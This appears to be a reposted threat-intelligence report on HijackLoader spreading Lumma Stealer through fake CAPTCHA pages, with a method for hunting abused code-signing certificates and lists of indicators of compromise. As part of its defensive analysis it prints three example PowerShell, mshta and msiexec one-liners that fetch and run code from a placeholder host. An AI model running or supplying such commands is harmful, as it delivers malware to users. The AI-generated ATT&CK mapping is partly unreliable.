Evolution of HijackLoader: Exploiting Authentic Signing Certificates

Short Summary:

Since mid-September 2024, there has been a notable rise in the deployment of “Lumma Stealer” malware through the “HijackLoader” malicious loader. A significant detection occurred on October 2, 2024, when a signed HijackLoader sample was blocked. The report discusses the methodology for hunting abused code-signing certificates and provides indicators of compromise.

Key Points:

  • Increase in “Lumma Stealer” malware deployments since mid-September 2024.
  • Detection of a signed HijackLoader sample on October 2, 2024, which was poorly detected by security products.
  • Methodology for hunting abused code-signing certificates was initiated.
  • The infection chain involves a fake CAPTCHA campaign leading to PowerShell execution.
  • Multiple abused code-signing certificates were identified and reported.
  • Malware signed with these certificates can evade traditional detection methods.
  • Emphasizes the need for complementary detection tactics beyond code-signing verification.

MITRE ATT&CK TTPs – created by AI

  • ExecutionT1059
    • PowerShell execution via scripts.
    • Using mshta.exe to execute malicious code.
    • Utilizing msiexec.exe for silent downloads and execution.
  • PersistenceT1122
    • DLL sideloading to execute HijackLoader.
  • Command and ControlT1071
    • Communication with C2 servers for further instructions.
  • Credential AccessT1003
    • Deployment of Lumma Stealer to harvest credentials.


Since mid-September 2024, our telemetry has revealed a significant increase in “Lumma Stealer” malware deployments via the “HijackLoader” malicious loader.

On October 2, 2024, HarfangLab EDR detected and blocked yet another HijackLoader deployment attempt – except this time, the malware sample was properly signed with a genuine code-signing certificate.

In response, we initiated a hunt for code-signing certificates (ab)used to sign malware samples. We identified and reported more of such certificates. This report briefly presents the associated stealer threat, outlines the methodology for hunting these certificates, and providees indicators of compromise.

HijackLoader deployment workflow

Infection chain: the fake CAPTCHA campaign

The so-called “fake CAPTCHA” campaign has already been extensively documented. The overall deployment tactic is unfolded as follows:

Figure 1 - Infection chain overview
Figure 1 – Infection chain overview

1) The target visits a malicious website showing a fake CAPTCHA Web page:

Figure 2 - Fake CAPTCHA Web page
Figure 2 – Fake CAPTCHA Web page

2) Upon clicking the “I’m not a robot” button, a pop-up invites targets to type a series of keyboard shortcuts so they open a command line interpreter, paste and execute a PowerShell payload (which has been automatically copied in the clipboard):

Figure 3 - Path to PowerShell execution
Figure 3 – Path to PowerShell execution

3) As a result of the PowerShell execution, a ZIP archive is downloaded, decompressed and a binary is executed from it.

Starting mid-September 2024, we could identify in our telemetry 3 variants of the PowerShell script which is used during the second step:

  • Use of mshta.exe: The script leverages the Microsoft HTML Application Host to execute malicious code from a remote URL. Arbitrary example: mshta hxxps://payload[.]url/tra17
  • Raw PowerShell with iex (Invoke-Expression). In this variant, a PowerShell script is directly executed from a remote file. Arbitrary example: iex (iwr hxxps://payload[.]url/a.txt -UseBasicParsing).Content
  • Use of msiexec.exe: The script also employs the Microsoft Windows Installer to silently download and execute a payload from a remote URL. Arbitrary example: C:windowssystem32msiexec.exe /fv hxxps://payload[.]url/DB2jh /q

HijackLoader execution from DLL sideloading

The initial ZIP archive samples we analyzed from the aforementioned infection chain contained a DLL sideloading package, which led to HijackLoader execution. This package consists of three components:

  1. A legitimate application binary;
  2. A malicious sideloaded DLL;
  3. An optional additional data file.
Figure 4 - HijackLoader and DLL sideloading
Figure 4 – HijackLoader and DLL sideloading

For most DLL sideloading packages we analyzed, the purpose of the sideloaded HijackLoader DLL is to decrypt and execute an encrypted file which is provided in the package. This file conceals the final HijackLoader stage, which is aimed at downloading and executing a stealer implant (Lumma Stealer in our cases).

A wild signed HijackLoader appears!

On October 2, 2024, HarfangLab EDR detected and blocked a HijackLoader deployment attempt against a customer. We noticed that the executable which triggered the detection (SHA-256: 1839b7152814b16b9f28326081f16bf9c5bbbb380005232c92d25c9a3e36e337) was a signed HijackLoader sample, and was not part of a DLL sideloading package:

Figure 5 - Signed HijackLoader detection
Figure 5 – Signed HijackLoader detection

When the malicious attempt was detected by HarfangLab EDR and for at least 2 days, the signed HijackLoader sample was very poorly detected by security products:

Figure 6 - Detection of the signed HijackLoader according to a popular online multiscanner on 2024-10-03 at midnight
Figure 6 – Detection of the signed HijackLoader according to a popular online multiscanner on 2024-10-03 at midnight

The associated code-signing certificate has been revoked between October 3 and 4. Malicious executables that are signed with this certificate are now properly detected by most security products.

Besides the HijackLoader deployment tactic being switched from a DLL sideloading package to a signed binary, the sample execution logic remains the same, and has been publicly described in several articles already. The command and control hostname for the signed sample we initially detected (SHA-256: 1839b7152814b16b9f28326081f16bf9c5bbbb380005232c92d25c9a3e36e337) is me3ar40.quickworld[.]shop (see Fig. 7).

Figure 7 - HijackLoader C2 hostname
Figure 7 – HijackLoader C2 hostname

Signed malware samples seem to evade traditional detection methods rather well. For instance, the capture below shows the poor detection rate for another HijackLoader sample (SHA-256 f158c65261bcab6e93927a219d12f596a4e40857bbd379f9889710ea17251e5e) we identified, and which is impersonating the “Firefox” browser:

Figure 8 - Poor detection rate for a signed HijackLoader sample on 2024-10-09
Figure 8 – Poor detection rate for a signed HijackLoader sample on 2024-10-09

As a result, we tried to pivot from the HijackLoader occurence we detected to identify further abused code-signing certificates.

Hunting for more abused code-signing certificates

Pivoting from a C2 hostname

In order to hunt for more abused code-signing certificates, we first looked for signed executables which accessed a URL on a known HijackLoader sample C2 (quickworld.shop):

Figure 9 - Signed malware using the same C2 domain
Figure 9 – Signed malware using the same C2 domain

Doing so, we could identify new signed malicious samples, and the abuse of the 2 following code-signing certificates:

Name: Lider LLC
Valid From: 01:58 PM 06/14/2024
Valid To: 01:58 PM 06/15/2025
Thumbprint: 2DD67214D7C7274458CFECC78E4B51063869D8E3
Serial Number: 39 DF 1C 6C 0F 51 C5 9F 17 59 CA 59

Name: Hangzhou Rongyi Network Technology Co., Ltd.
Valid From: 07:50 AM 09/27/2024
Valid To: 07:50 AM 09/27/2025
Thumbprint: DCC865C6DD9EA2318439F207ACBC2AC0797FB51B
Serial Number: 16 16 F1 4F BA 9C 87 AB 97 AD 25 86 1E E7 A9 DC 

We could then further identify additional samples which were signed using these certificates, confirm they were malicious, and extract samples data (like C2 hostnames) to iterate the process with the newly identified domains:

Figure 10 - Hunting for signed malware samples via domain names
Figure 10 – Hunting for signed malware samples via domain names

Thanks to this technique we identified a third abused code-signing certificate.

Name: Shanghai Yungpu Chemical Co., Ltd.
Valid From: 04:20 PM 09/19/2024
Valid To: 08:06 AM 09/19/2025
Thumbprint: FDD829D3B46933EF8015B70B6C3FCE6BA9675578
Serial Number: 69 1C 41 0E 33 DD F6 44 08 6F A2 41 10 7B 64 6E 

Pivoting from samples metadata

We checked malicious binaries metadata (copyright, original name, description, etc.) and noticed that some of them were not only reused in several malicious samples, but also copied from original legitimate software. For instance, some malicious samples (e.g. SHA-256 ff946f48f6bdf33d31f39614909115fead505c16426411897bd8e48362017d31) impersonate metadata of the legitimate “Wise Folder Hider” tool:

Figure 11 - Executable binary metadata
Figure 11 – Executable binary metadata

We leveraged this legitimate metadata impersonation to identify more malicious samples and abused code-signing certificates, according to the following heuristics (see Fig. 12):

  1. If the original legitimate software from which metadata is copied, is NOT signed; then any signed binary reusing its metadata is deemed suspicious.
  2. If the original legitimate software is signed; then any binary reusing its metadata but which is signed with a different certificate is deemed suspicious.
Figure 12 - Identifying newly signed malware via metadata
Figure 12 – Identifying newly signed malware via metadata

We analyzed suspicious samples to confirm they were malicious, and iterated over the previously described hunting loop from confirmed malicious samples. Doing so, we were able to identify 2 additional abused certificates:

Valid From: 07:55 AM 04/24/2024
Valid To: 07:55 AM 04/25/2025
Thumbprint: 2B20EE6FB83FF52BDD2714741A8783981795B8E7
Serial Number: 6B 7A F8 E1 3E 40 98 A5 07 B6 97 8A 

Name: Xi'an Tengyuanri Network Technology Co., Ltd.
Valid From: 08:18 AM 09/03/2024
Valid To: 08:18 AM 09/03/2025
Thumbprint: 4B2459E76864532BDB1F00BF909495C96A01F93C
Serial Number: 5C 70 B0 F5 7B 7D 26 ED 72 3E FF AE 43 D6 F4 71 


Our investigation, initiated by a HarfangLab EDR detection, led to identification of multiple abused code-signing certificates and associated malicious samples actively used in the wild.

We reported these abused code-signing certificates to their issuing autorities, resulting in them being revoked, within hours up to almost a day, enabling proper detection by other security vendors.

While we could not reliably determine whether these certificates were stolen or purposefully generated by threat actors, we assess with low to medium confidence that they were likely created deliberately. For several issuing certificate autorities, we noticed that acquiring and activating a code-signing certificate is mostly automated, and only requires a valid company registration number as well as a contact person.

This research underscores that malware can be signed, highlighting that code signature alone cannot serve as a baseline indicator of trustworthiness. Therefore, it’s crucial to implement several complementary detection tactics, such as monitoring system behaviors and conducting in-memory scanning on endpoints, to protect against the execution of signed malware.


Indicators of compromise (IOCs)

Associated IOCs are also available on our GitHub repository.

Hashes (SHA-256)

Samples signed by Acira Consulting Inc
Samples signed by Xi’an Tengyuanri Network Technology Co
Samples signed by Shanghai Yungpu Chemical Co
Samples signed by LLC SEVER
Samples signed by Lider LLC
Samples signed by Hangzhou Rongyi Network Technology Co

Abused code-signing certificates details

Name: Lider LLC
Issuer: GlobalSign GCC R45 EV CodeSigning CA 2020
Valid From: 01:58 PM 06/14/2024
Valid To: 01:58 PM 06/15/2025
Valid Usage: Code Signing
Algorithm: sha256RSA
Thumbprint: 2DD67214D7C7274458CFECC78E4B51063869D8E3
Serial Number: 39 DF 1C 6C 0F 51 C5 9F 17 59 CA 59

Name: Hangzhou Rongyi Network Technology Co., Ltd.
Issuer: Certum Extended Validation Code Signing 2021 CA
Valid From: 07:50 AM 09/27/2024
Valid To: 07:50 AM 09/27/2025
Valid Usage: Code Signing
Algorithm: sha256RSA
Thumbprint: DCC865C6DD9EA2318439F207ACBC2AC0797FB51B
Serial Number: 16 16 F1 4F BA 9C 87 AB 97 AD 25 86 1E E7 A9 DC 

Name: Shanghai Yungpu Chemical Co., Ltd.
Issuer: SSL.com EV Code Signing Intermediate CA RSA R3
Valid From: 04:20 PM 09/19/2024
Valid To: 08:06 AM 09/19/2025
Valid Usage: Code Signing
Algorithm: sha256RSA
Thumbprint: FDD829D3B46933EF8015B70B6C3FCE6BA9675578
Serial Number: 69 1C 41 0E 33 DD F6 44 08 6F A2 41 10 7B 64 6E 

Issuer: GlobalSign GCC R45 EV CodeSigning CA 2020
Valid From: 07:55 AM 04/24/2024
Valid To: 07:55 AM 04/25/2025
Valid Usage: Code Signing
Algorithm: sha256RSA
Thumbprint: 2B20EE6FB83FF52BDD2714741A8783981795B8E7
Serial Number: 6B 7A F8 E1 3E 40 98 A5 07 B6 97 8A 

Name: Xi'an Tengyuanri Network Technology Co., Ltd.
Issuer: Certum Extended Validation Code Signing 2021 CA
Valid From: 08:18 AM 09/03/2024
Valid To: 08:18 AM 09/03/2025
Valid Usage: Code Signing
Algorithm: sha256RSA
Thumbprint: 4B2459E76864532BDB1F00BF909495C96A01F93C
Serial Number: 5C 70 B0 F5 7B 7D 26 ED 72 3E FF AE 43 D6 F4 71 

Source: Original Post